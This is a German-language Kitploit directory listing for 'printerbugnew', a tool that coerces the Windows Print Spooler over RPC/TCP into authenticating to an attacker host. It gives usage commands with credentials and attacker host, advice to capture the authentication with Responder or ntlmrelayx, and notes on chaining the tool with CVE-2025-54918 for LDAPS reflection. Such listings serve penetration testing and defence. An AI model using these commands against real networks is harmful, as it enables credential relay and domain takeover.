Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
printerbugnew — Die DCERPC-only printerbug.py Version | Kitploit
Tools/GitHubGitHub/decoder-it/printerbugnew
Privilege EscalationSchwachstellenanalyseExploitationLaterale BewegungPenetrationstestsCommand and ControlAuthentifizierungRed Teaming
GitHubdecoder-it/printerbugnew

printerbugnew

Die DCERPC-only printerbug.py Version

Repository anzeigen
233262vor 10 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Reiner RPC über TCP Druckspooler-Trigger

Für Windows 11 22H2+ / Windows Server 2025

Verwendung

root@kitploit:~
printerbugnew.py <target_host> [username] [password] [domain] [attacker_host] [tcp_port]

Beispiele

Anonyme Verbindung

root@kitploit:~
printerbugnew.py 192.168.1.100

Mit Anmeldedaten

root@kitploit:~
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN

Backconnect zu einem anderen Host auslösen (Angreifer)

root@kitploit:~
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50

Bestimmten RPC-Port verwenden

root@kitploit:~
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50 49152

Hinweise

  • Ziel muss Windows 11 22H2+ oder Server 2025 sein (RPC über TCP standardmäßig)
  • Bei älteren Versionen verwendet spoolss RPC über Named Pipes (SMB)
  • Stellen Sie sicher, dass Port 135 und die dynamischen RPC-Ports (49152-65535) offen sind
  • Starten Sie Responder oder ntlmrelayx auf attacker_host, um die Authentifizierung zu erfassen
  • Kerberos schlägt in diesem Fall aufgrund eines fehlerhaften SPN vom Spooler fehl, was einen NTLM-Fallback erzwingt.
  • Finden Sie den RPC/TCP-Port des Ziel-Spoolers, indem Sie den Endpoint Mapper (EPM) des Ziels auf TCP/135 nach der Schnittstellen-UUID 12345678-1234-abcd-ef00-0123456789ab abfragen. Sie können rpcdump.py, PortQry oder ein beliebiges Tool verwenden – oder die EPM-Abfrage einfach direkt in diesen Code implementieren ;)
  • Basiert auf https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py

    Bild

    Bild

    Bild

Update für CVE-2025-54918

Dieser Exploit über Reflection funktioniert nur auf W2025 mit dem "neuen" Printerbug (DCERPC statt Named Pipes). Sie müssen ntlmrelayx an einigen Stellen modifizieren, damit es funktioniert. Danach können Sie den Printerbug auf einem W2025-DC remote auslösen und die Authentifizierung über LDAPS(!) reflektieren, selbst wenn Channel Bindings ERFORDERLICH ist

ldaprelayclient.py:
Bild
rpcrelayserver.py
Bild

und relay ;)
Bild


Die Schwachstelle wurde im September 2025 Patch Tuesday behoben: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54918

Der Fix stellt sicher, dass das MIC immer berechnet wird, selbst wenn die Type-3-Nachricht leer ist.

Dank an den Autor dieser CVE für einen wertvollen Hinweis :)

Tool herunterladen